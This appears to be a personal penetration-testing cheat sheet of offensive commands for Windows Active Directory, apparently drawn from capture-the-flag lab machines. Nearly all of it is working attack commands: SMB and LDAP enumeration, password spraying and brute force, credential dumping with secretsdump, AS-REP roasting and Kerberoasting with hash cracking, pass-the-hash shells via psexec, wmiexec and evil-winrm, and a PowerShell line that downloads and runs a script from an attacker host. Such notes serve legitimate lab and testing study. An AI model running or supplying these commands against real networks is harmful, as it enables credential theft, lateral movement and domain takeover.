# smb enum
- port 139 445
smbmap -H 10.0.0.1 # no pwd
smbmap -H 10.10.10.100 -d domain -u user -p pwd # pwd
smbclient -N -L \\\\192.168.3.124 # no pwd
smbclient -N \\\\10.10.11.152\\Shares # interactive
smbclient -W domain -U user //10.0.0.1/ADMIN$ # pwd
enum4linux -a 10.0.0.1
msf5 auxiliary(scanner/smb/pipe_auditor) > run
msf5 auxiliary(scanner/smb/smb_lookupsid) > run
rpcclient -U bhult 10.10.10.193
> enumdomusers
> enumprivs
> enumprinters
- pwd spray
cme smb 192.168.73.20 -d domain -u users.txt -p Password4
- brute
hydra -L users.lst -P wordlist.lst 10.10.10.193 smb
- change pwd
smbpasswd -U bhult -r 10.10.10.193
- mount
mount -t cifs //10.10.10.100/Users /mnt/smb -v -o domain=dom,user=user,pass=pwd
- mount in win
net use j: \\hathor\share /u:windcorp.htb\BeatriceMill pwd
net use * /del /y

# ldap enum
- port 389 636 3268
nmap -sT -Pn -n --open 192.168.73.20 -p389 --script ldap-rootdse
ldapsearch -x -h 10.10.11.147 -D 'windcorp\BeatriceMill' -w 'pwd'  -b "CN=Users,DC=windcorp,DC=htb"
ldapsearch -x -h 10.10.10.100 -p 389 -D 'domain\user' -w 'pwd' -b "dc=active,dc=htb" -s sub "(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.113556.1.4.803:=2)))" samaccountname | grep sAMAccountNamePage
GetADUsers.py -all active.htb/user:pwd -dc-ip 10.10.10.100
- export LAPS
cme ldap 10.10.11.152 -u svc_deploy -p 'pwd' --kdcHost timelapse.htb -M laps

# dns enum
- port 53
dig srv _ldap._tcp.dc._msdcs.domain @192.168.73.20

# kerberos
- port 88
kerbrute userenum -d spookysec.local --dc 10.10.246.75 userlist.txt
- enum user hashes & kerberos keys
secretsdump.py spookysec.local/backup:pwd@<dc-ip> -just-dc  # exported hash can be used to get shell
- ASREPRoasting, Getting TGT for svc-admin
GetNPUsers.py -dc-ip 10.10.246.75 spookysec.local/svc-admin -no-pass
- tgs/spn
GetUserSPNs.py domain/user:pass -dc-ip 10.10.10.100 -request
john --wordlist=/usr/share/wordlists/rockyou.txt spn-admin.txt
hashcat -m 13100 -a 0 GetUserSPNs.out /usr/share/wordlists/rockyou.txt --force
- get shell
psexec.py domain/user:pwd@<target-ip>
psexec.py user@<target-ip> -hashes hash
smbexec.py domain/user@<target-ip> -hashes hash
wmiexec.py domain/user@<target-ip>

# winRM
- port 5985 5986
evil-winrm -i 10.10.246.75 -u user -H hash
evil-winrm -i 10.10.10.161 -u user -p 'pwd'
evil-winrm -i 10.10.11.152 -S -c cert.crt -k prv.key

# common
- generate wordlist from url
cewl -d 5 -m 5 -w wordlist.lst url --with-numbers
- gpp Groups.xml crack
gpp-decrypt hash
- share files
smbserver.py tools .
copy \\10.10.14.31\tools\file .
certutil -encode xx.zip encoded.txt
- download file
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/PowerView.ps1')
- check NTLM hash
hashid 9cb01504ba0247ad5c6e08f7ccae7903
- show share
net view 127.0.0.1
- crack pfx pwd
crackpkcs12 -d /usr/share/wordlists/rockyou.txt x.pfx
- export cert from pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
- export private key from pfx
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key
- crack zip
fcrackzip -D -u -p /usr/share/wordlists/rockyou.txt orcharddb.zip